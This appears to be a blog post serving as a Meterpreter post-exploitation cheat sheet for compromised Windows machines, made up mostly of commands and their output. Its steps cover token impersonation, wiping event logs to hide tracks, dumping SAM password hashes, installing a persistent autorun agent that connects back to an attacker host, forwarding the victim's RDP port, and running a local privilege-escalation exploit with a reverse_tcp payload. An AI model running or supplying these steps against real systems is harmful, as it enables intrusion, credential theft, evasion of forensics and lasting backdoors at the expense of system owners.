Post Image


Yes, It's a better shell.

[ + ] Meterpreter Basics.

[ + ] Setting up a handler.
use exploit/multi/handler
show payloads
Find your meterpreter payload to listen for.

[ + ] Change directory on both victim and attacking machines.
--> Local Change Directory (Attacking Machine):
lcd /localDir/
--> Change directory in your shell (Vitim Machine):

[ + ] Token Impersonation:

meterpreter> use incognito
Loading extension incognito...success.
meterpreter> help

Incognito Commands

    Command              Description                                             
    -------              -----------                                             
    add_group_user       Attempt to add a user to a global group with all tokens 
    add_localgroup_user  Attempt to add a user to a local group with all tokens  
    add_user             Attempt to add a user with all tokens                   
    impersonate_token    Impersonate specified token                             
    list_tokens          List tokens available under current user context        
    snarf_hashes         Snarf challenge/response hashes for every token         


"What we will need to do first is identify if there are any valid tokens on this system. Depending on the level of access that your exploit provides, you are limited in the tokens you are able to view. When it comes to token stealing, SYSTEM is king. As SYSTEM, you are allowed to see and use any token on the box."

--> Pro Tip - Administrators don’t have access to all the tokens either, but they do have the ability to migrate to SYSTEM processes, effectively making them SYSTEM and able to see all the tokens available.

meterpreter> list_tokens -u

Delegation Tokens Available

Impersonation Tokens Available

meterpreter> impersonate_token SNEAKS.IN\\Administrator
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\Administrator
meterpreter> getuid
Server username: SNEAKS.IN\Administrator
meterpreter> shell
Process 2804 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> whoami



[ + ] Is it possible for me to run an exploit through meterpreter as a background job?
--> Yup.
meterpreter> run -j
[*] Exploit running as background job.

[ + ] Lets clear our tracks.

meterpreter> clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...


[ + ] File Transfer:

meterpreter> download C:\\boot.ini
[*] downloading: C:\boot.ini -> C:\boot.ini
[*] downloaded : C:\boot.ini -> C:\boot.ini/boot.ini

Similarly, we can perform uploads to the target system with the 'upload' command. This will expect an absolute path on your local file system to the file you wish you transfer over.

+ How can I execute something on the target machine?

meterpreter> execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


In this case, we execute cmd.exe on the target machine and specify that we want to interact with the process.

[ + ] Lets dump some hashes from the SAM Database.

meterpreter> run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Or you can just type hashdump...

[ + ] Migrate to a more stable process.

meterpreter> run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)

You can also specify to migrate to some PID. For example - use cmd.exe to open notepad and then grab the PID to migrate to it with: migrate <PID>

[ + ] Lets Install a persistent service.

meterpreter> run persistence -U -i 5 -p 443 -r <LHOST>
[*] Creating a persistent agent: LHOST=LHOST LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613976 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs
[*] Agent executed with PID 492
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc

"We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try to connect back to our listener every 5 seconds at IP address <LHOST> on port 443."

[ + ] Can we forward out a local port with meterpreter to on our attacking machine?
--> Yup.

meterpreter> portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
     -L >opt>  The local host to listen on (optional).
     -h        Help banner.
     -l >opt>  The local port to listen on.
     -p >opt>  The remote port to connect on.
     -r >opt>  The remote host to connect on.

[ + ] Lets forward out the RDP Service on the Victim Machine! For fun?

meterpreter> portfwd add –l 3389 –p 3389 –r <TARGET IP>
[*] Local TCP relay created: >-> <TARGET IP>:3389

--> Then, on your attacking machine:

+ Privilege Escalation with Meterpreter?

--> priv

meterpreter> use priv
Loading extension priv...success.

--> getsystem

meterpreter> getsystem system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

[ + ] Local Exploits

meterpreter> background
[*] Backgrounding session 1...
msf exploit(ms10_002_aurora)> use exploit/windows/local/
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use exploit/windows/local/ms10_015_kitrap0d
use exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms11_080_afdjoinleaf
use exploit/windows/local/ms13_005_hwnd_broadcast
use exploit/windows/local/ms13_081_track_popup_menu
msf exploit(ms10_002_aurora)>


msf exploit(ms10_002_aurora)> use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d)> set SESSION 1
msf exploit(ms10_015_kitrap0d)> set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d)> set LHOST
msf exploit(ms10_015_kitrap0d)> set LPORT 4443
msf exploit(ms10_015_kitrap0d)> show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST      yes       The listen address
   LPORT     4443             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)

msf exploit(ms10_015_kitrap0d) > exploit

[*]  Started reverse handler on 
[*]  Launching notepad to host the exploit...
[+]  Process 4048 launched.
[*]  Reflectively injecting the exploit DLL into 4048...
[*]  Injecting exploit into 4048 ...
[*]  Exploit injected. Injecting payload into 4048...
[*]  Payload injected. Executing exploit...
[+]  Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*]  Sending stage (769024 bytes) to
[*]  Meterpreter session 2 opened ( -> at 2014-03-11 11:14:00 -0400

meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM


[ + ] Windows / Linux Post Modules (Meterpreter Enumeration)

[ + ] Not gonna lie, just check this out: for Windows Post:

[ + ] Same applies for Linux Post:

[ + ] Interested in Powershell and Meterpreter?


Comments are closed.